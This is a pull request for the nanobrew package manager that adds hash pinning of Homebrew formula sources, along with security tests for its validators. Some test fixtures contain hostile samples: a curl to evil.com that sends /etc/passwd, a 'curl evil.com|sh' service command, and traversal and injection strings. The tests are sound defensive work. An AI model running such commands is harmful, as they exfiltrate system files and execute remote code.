### PR TITLE
security: cache-and-pin formula source to detect tampering

### DIFF
--- a/src/build/formula_cache.zig
+++ b/src/build/formula_cache.zig
@@ -1,0 +1,149 @@
+// nanobrew — Formula source cache and hash pinning
+//
+// Caches Homebrew formula source files (.rb) and pins their SHA256 hashes.
+// First fetch stores content + hash. Subsequent fetches verify the hash matches,
+// detecting supply-chain tampering of upstream formula sources.
+
+const std = @import("std");
+const fetch = @import("../net/fetch.zig");
+const paths = @import("../platform/paths.zig");
+
+const FORMULA_CACHE_DIR = paths.CACHE_DIR ++ "/formulas";
+
+/// Returns the path to the SHA256 hash file for a cached formula.
+/// Format: FORMULA_CACHE_DIR/<name>-<version>.rb.sha256
+/// Rejects name/version containing ".." or "/" to prevent path traversal.
+/// Returns "" on invalid input or buffer overflow.
+pub fn hashPath(buf: []u8, name: []const u8, version: []const u8) []const u8 {
+    if (containsTraversal(name) or containsTraversal(version)) return "";
+    return std.fmt.bufPrint(buf, "{s}/{s}-{s}.rb.sha256", .{ FORMULA_CACHE_DIR, name, version }) catch return "";
+}
+
+/// Returns the path to the cached formula source file.
+/// Format: FORMULA_CACHE_DIR/<name>-<version>.rb
+/// Rejects name/version containing ".." or "/" to prevent path traversal.
+/// Returns "" on invalid input or buffer overflow.
+pub fn cachePath(buf: []u8, name: []const u8, version: []const u8) []const u8 {
+    if (containsTraversal(name) or containsTraversal(version)) return "";
+    return std.fmt.bufPrint(buf, "{s}/{s}-{s}.rb", .{ FORMULA_CACHE_DIR, name, version }) catch return "";
+}
+
+fn containsTraversal(s: []const u8) bool {
+    return std.mem.indexOf(u8, s, "..") != null or std.mem.indexOf(u8, s, "/") != null;
+}
+
+/// Compute the SHA256 hash of content and write the 64-char lowercase hex digest to out.
+pub fn computeSha256Hex(content: []const u8, out: *[64]u8) void {
+    var hasher = std.crypto.hash.sha2.Sha256.init(.{});
+    hasher.update(content);
+    const digest = hasher.finalResult();
+    const charset = "0123456789abcdef";
+    for (digest, 0..) |byte, idx| {
+        out[idx * 2] = charset[byte >> 4];
+        out[idx * 2 + 1] = charset[byte & 0x0f];
+    }
+}
+
+/// Fetch a formula source, verify its hash against the pinned value, and cache on first fetch.
+///
+/// On network failure: falls back to cached content if available.
+/// On hash mismatch: returns error.FormulaSourceChanged (possible supply-chain attack).
+/// On first fetch: caches content and pins the hash.
+pub fn getVerifiedFormula(alloc: std.mem.Allocator, name: []const u8, version: []const u8, url: []const u8) ![]u8 {
+    const stderr = std.fs.File.stderr().deprecatedWriter();
+
+    var hash_buf: [512]u8 = undefined;
+    const hash_path = hashPath(&hash_buf, name, version);
+    if (hash_path.len == 0) return error.InvalidName;
+
+    var cache_buf: [512]u8 = undefined;
+    const cache_path = cachePath(&cache_buf, name, version);
+    if (cache_path.len == 0) return error.InvalidName;
+
+    // Try to download fresh content
+    const fresh_content = fetch.get(alloc, url) catch |err| {
+        // Network failure: try cached content with hash verification
+        const cached = std.fs.cwd().readFileAlloc(alloc, cache_path, 10 * 1024 * 1024) catch {
+            return err;
+        };
+
+        // Verify cached content against stored hash pin
+        var stored_hash: [64]u8 = undefined;
+        const hash_file = std.fs.openFileAbsolute(hash_path, .{}) catch {
+            alloc.free(cached);
+            return err;
+        };
+        defer hash_file.close();
+        const n = hash_file.readAll(&stored_hash) catch {
+            alloc.free(cached);
+            return err;
+        };
+        if (n != 64) {
+            alloc.free(cached);
+            return err;
+        }
+        var cached_hex: [64]u8 = undefined;
+        computeSha256Hex(cached, &cached_hex);
+        if (!std.mem.eql(u8, &cached_hex, &stored_hash)) {
+            stderr.print("nb: WARNING: cached formula for {s} has been tampered with\n", .{name}) catch {};
+            alloc.free(cached);
+            return error.FormulaSourceChanged;
+        }
+
+        stderr.print("nb: warning: network fetch failed for {s}, using cached formula\n", .{name}) catch {};
+        return cached;
+    };
+
+    // Compute SHA256 of fresh content
+    var fresh_hex: [64]u8 = undefined;
+    computeSha256Hex(fresh_content, &fresh_hex);
+
+    // Check for existing pinned hash
+    var existing_hash: [64]u8 = undefined;
+    if (std.fs.cwd().readFileAlloc(alloc, hash_path, 64)) |pinned| {
+        defer alloc.free(pinned);
+        if (pinned.len >= 64) {
+            @memcpy(&existing_hash, pinned[0..64]);
+            if (std.mem.eql(u8, &existing_hash, &fresh_hex)) {
+                // Hash matches — content is authentic
+                return fresh_content;
+            } else {
+                // Hash mismatch — possible supply-chain tampering
+                stderr.print("nb: WARNING: formula source hash changed for {s}\n", .{name}) catch {};
+                stderr.print("    pinned:  {s}\n", .{&existing_hash}) catch {};
+                stderr.print("    current: {s}\n", .{&fresh_hex}) catch {};
+                alloc.free(fresh_content);
+                return error.FormulaSourceChanged;
+            }
+        }
+    } else |_| {}
+
+    // First fetch: create cache directory, write content and hash.
+    // Fail closed: if we cannot persist the hash pin, do not return content —
+    // otherwise we have trust-on-first-use with no persisted hash to verify later.
+    std.fs.makeDirAbsolute(FORMULA_CACHE_DIR) catch {};
+
+    const cache_file = std.fs.createFileAbsolute(cache_path, .{}) catch {
+        alloc.free(fresh_content);
+        return error.CacheWriteFailed;
+    };
+    cache_file.writeAll(fresh_content) catch {
+        cache_file.close();
+        alloc.free(fresh_content);
+        return error.CacheWriteFailed;
+    };
+    cache_file.close();
+
+    const pin_file = std.fs.createFileAbsolute(hash_path, .{}) catch {
+        alloc.free(fresh_content);
+        return error.CacheWriteFailed;
+    };
+    pin_file.writeAll(&fresh_hex) catch {
+        pin_file.close();
+        alloc.free(fresh_content);
+        return error.CacheWriteFailed;
+    };
+    pin_file.close();
+
+    return fresh_content;
+}

--- a/src/build/postinstall.zig
+++ b/src/build/postinstall.zig
@@ -8,6 +8,19 @@ const std = @import("std");
 const Formula = @import("../api/formula.zig").Formula;
 const fetch = @import("../net/fetch.zig");
 
+
+const sandbox = @import("sandbox.zig");
+const formula_cache = @import("formula_cache.zig");
+
+pub const ParsedCommand = struct {
+    argv: []const []const u8,
+
+    pub fn deinit(self: ParsedCommand, alloc: std.mem.Allocator) void {
+        for (self.argv) |arg| alloc.free(arg);
+        alloc.free(self.argv);
+    }
+};
+
 pub fn runPostInstall(alloc: std.mem.Allocator, formula: Formula) !void {
     const stdout = std.fs.File.stdout().deprecatedWriter();
     const stderr = std.fs.File.stderr().deprecatedWriter();
@@ -33,6 +46,10 @@ pub fn runPostInstall(alloc: std.mem.Allocator, formula: Formula) !void {
 fn runPostInstallScript(alloc: std.mem.Allocator, formula: Formula) !void {
     const stderr = std.fs.File.stderr().deprecatedWriter();
 
+    // Compute effective version early (needed for cache key)
+    var ver_buf: [128]u8 = undefined;
+    const eff_ver = formula.effectiveVersion(&ver_buf);
+
     // Fetch Ruby formula source
     const first_letter = if (formula.name.len > 0) formula.name[0..1] else return;
     const url = std.fmt.allocPrint(alloc, "https://raw.githubusercontent.com/Homebrew/homebrew-core/HEAD/Formula/{s}/{s}.rb", .{
@@ -40,7 +57,7 @@ fn runPostInstallScript(alloc: std.mem.Allocator, formula: Formula) !void {
     }) catch return error.OutOfMemory;
     defer alloc.free(url);
 
-    const ruby_src = fetch.get(alloc, url) catch return;
+    const ruby_src = formula_cache.getVerifiedFormula(alloc, formula.name, eff_ver, url) catch return;
     defer alloc.free(ruby_src);
 
     if (ruby_src.len == 0) return;
@@ -50,8 +67,6 @@ fn runPostInstallScript(alloc: std.mem.Allocator, formula: Formula) !void {
 
     // Parse and execute commands
     var keg_buf: [512]u8 = undefined;
-    var ver_buf: [128]u8 = undefined;
-    const eff_ver = formula.effectiveVersion(&ver_buf);
     const keg_path = std.fmt.bufPrint(&keg_buf, "/opt/nanobrew/prefix/Cellar/{s}/{s}", .{
         formula.name, eff_ver,
     }) catch return;

--- a/src/security_test.zig
+++ b/src/security_test.zig
@@ -14,6 +14,12 @@ const placeholder = @import("platform/placeholder.zig");
 const store = @import("store/store.zig");
 const client = @import("api/client.zig");
 
+
+
+const postinstall = @import("build/postinstall.zig");
+const launchd = @import("services/launchd.zig");
+const sandbox = @import("build/sandbox.zig");
+const formula_cache = @import("build/formula_cache.zig");
 // ────────────────────────────────────────────────────────────────────────
 // 1. Path traversal in package names
 // ────────────────────────────────────────────────────────────────────────
@@ -359,4 +365,209 @@ test "isValidSha256 rejects non-hex strings" {
     try testing.expect(!store.isValidSha256("abc"));
     try testing.expect(!store.isValidSha256("zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"));
     try testing.expect(store.isValidSha256("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"));
+}
+
+
+
+// 11. HTTPS enforcement for API and bottle domain env var overrides
+// ────────────────────────────────────────────────────────────────────────
+
+test "isValidDomainOverride rejects non-HTTPS URLs" {
+    try testing.expect(!client.isValidDomainOverride("http://evil.com/api/"));
+    try testing.expect(!client.isValidDomainOverride("ftp://evil.com/"));
+    try testing.expect(!client.isValidDomainOverride("javascript:alert(1)"));
+    try testing.expect(!client.isValidDomainOverride(""));
+    try testing.expect(!client.isValidDomainOverride("file:///etc/passwd"));
+    // Valid
+    try testing.expect(client.isValidDomainOverride("https://formulae.brew.sh/api/formula/"));
+    try testing.expect(client.isValidDomainOverride("https://my-mirror.example.com/"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 12. Launchd plist content validation
+// ────────────────────────────────────────────────────────────────────────
+
+test "isPlistSafe rejects plist with UserName root" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>UserName</key>
+        \\  <string>root</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/evil/1.0/bin/evil</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with ProgramArguments outside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/usr/bin/curl</string>
+        \\    <string>http://evil.com/steal?data=/etc/passwd</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe accepts safe plist with ProgramArguments inside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.redis</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/bin/redis-server</string>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/etc/redis.conf</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 13. systemd service file validation
+// ────────────────────────────────────────────────────────────────────────
+
+const systemd = @import("services/systemd.zig");
+
+test "isServiceFileSafe rejects User=root" {
+    const content =
+        \\[Unit]
+        \\Description=Evil Service
+        \\
+        \\[Service]
+        \\User=root
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/pkg/1.0/bin/mybin
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe rejects ExecStart outside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Malicious Service
+        \\
+        \\[Service]
+        \\ExecStart=/bin/bash -c 'curl evil.com|sh'
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe accepts safe service file with ExecStart inside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Safe Service
+        \\
+        \\[Service]
+        \\User=_myservice
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/mypkg/1.0/bin/mypkg --config /etc/mypkg.conf
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "database MAX_DB_SIZE is larger than old 1 MiB limit" {
+    try testing.expect(Database.MAX_DB_SIZE > 1024 * 1024);
+    try testing.expectEqual(@as(usize, 16 * 1024 * 1024), Database.MAX_DB_SIZE);
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 14. Sandbox profile generation
+// ────────────────────────────────────────────────────────────────────────
+
+test "sandbox profile contains keg path and no unreplaced placeholders" {
+    const alloc = testing.allocator;
+    const keg = "/opt/nanobrew/prefix/Cellar/wget/1.24.5";
+    const profile = try sandbox.generateProfile(alloc, keg);
+    defer alloc.free(profile);
+
+    // Profile must contain the keg path
+    try testing.expect(std.mem.indexOf(u8, profile, keg) != null);
+
+    // No unreplaced placeholders
+    try testing.expect(std.mem.indexOf(u8, profile, "@@KEG_PATH@@") == null);
+
+    // Contains key deny rules
+    try testing.expect(std.mem.indexOf(u8, profile, "(deny network") != null);
+    try testing.expect(std.mem.indexOf(u8, profile, "(deny default)") != null);
+}
+
+test "sandbox profile rejects keg path with shell metacharacters" {
+    const alloc = testing.allocator;
+    const result = sandbox.generateProfile(alloc, "/opt/nanobrew/\"evil");
+    try testing.expectError(error.UnsafeKegPath, result);
+}
+
+test "sandboxedArgv prepends sandbox-exec on macOS" {
+    const alloc = testing.allocator;
+    const original = &[_][]const u8{ "mkdir", "-p", "/some/path" };
+    const result = try sandbox.sandboxedArgv(alloc, original, "/opt/nanobrew/prefix/Cellar/pkg/1.0");
+    defer {
+        for (result.argv) |arg| alloc.free(@constCast(arg));
+        alloc.free(result.argv);
+        if (result.profile.len > 0) alloc.free(result.profile);
+    }
+
+    if (comptime builtin.os.tag == .macos) {
+        try testing.expectEqual(original.len + 3, result.argv.len);
+        try testing.expectEqualStrings("sandbox-exec", result.argv[0]);
+    } else {
+        try testing.expectEqual(original.len, result.argv.len);
+    }
+}
+
+
+
+// ────────────────────────────────────────────────────────────────────────
+// 15. Formula cache hash pinning
+// ────────────────────────────────────────────────────────────────────────
+
+test "formula cache hash path is derived from name and version" {
+    var buf: [512]u8 = undefined;
+    const path = formula_cache.hashPath(&buf, "wget", "1.24.5");
+    try testing.expect(std.mem.endsWith(u8, path, "wget-1.24.5.rb.sha256"));
+    try testing.expect(std.mem.startsWith(u8, path, "/opt/nanobrew/cache/formulas/"));
+}
+
+test "formula cache rejects names with path traversal" {
+    var buf: [512]u8 = undefined;
+    try testing.expectEqual(@as(usize, 0), formula_cache.hashPath(&buf, "../evil", "1.0").len);
+    try testing.expectEqual(@as(usize, 0), formula_cache.hashPath(&buf, "foo/../../bar", "1.0").len);
+}
+
+test "computeSha256Hex produces correct hex output" {
+    const input = "hello world\n";
+    var hex: [64]u8 = undefined;
+    formula_cache.computeSha256Hex(input, &hex);
+    // sha256("hello world\n") starts with a948904f
+    try testing.expect(std.mem.startsWith(u8, &hex, "a948904f"));
 }


### PR DESCRIPTION
## Origin

Originally submitted as PR #151 by @NeverVane (justrach/nanobrew#151).

Replicated as a maintainer-controlled branch per the project's updated security policy. See CONTRIBUTING.md for details.

## Summary

security: cache-and-pin formula source to detect tampering

## Attribution

All credit for the underlying work belongs to the original contributor. This PR preserves the diff exactly as submitted, with a clean rebase onto current `main`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)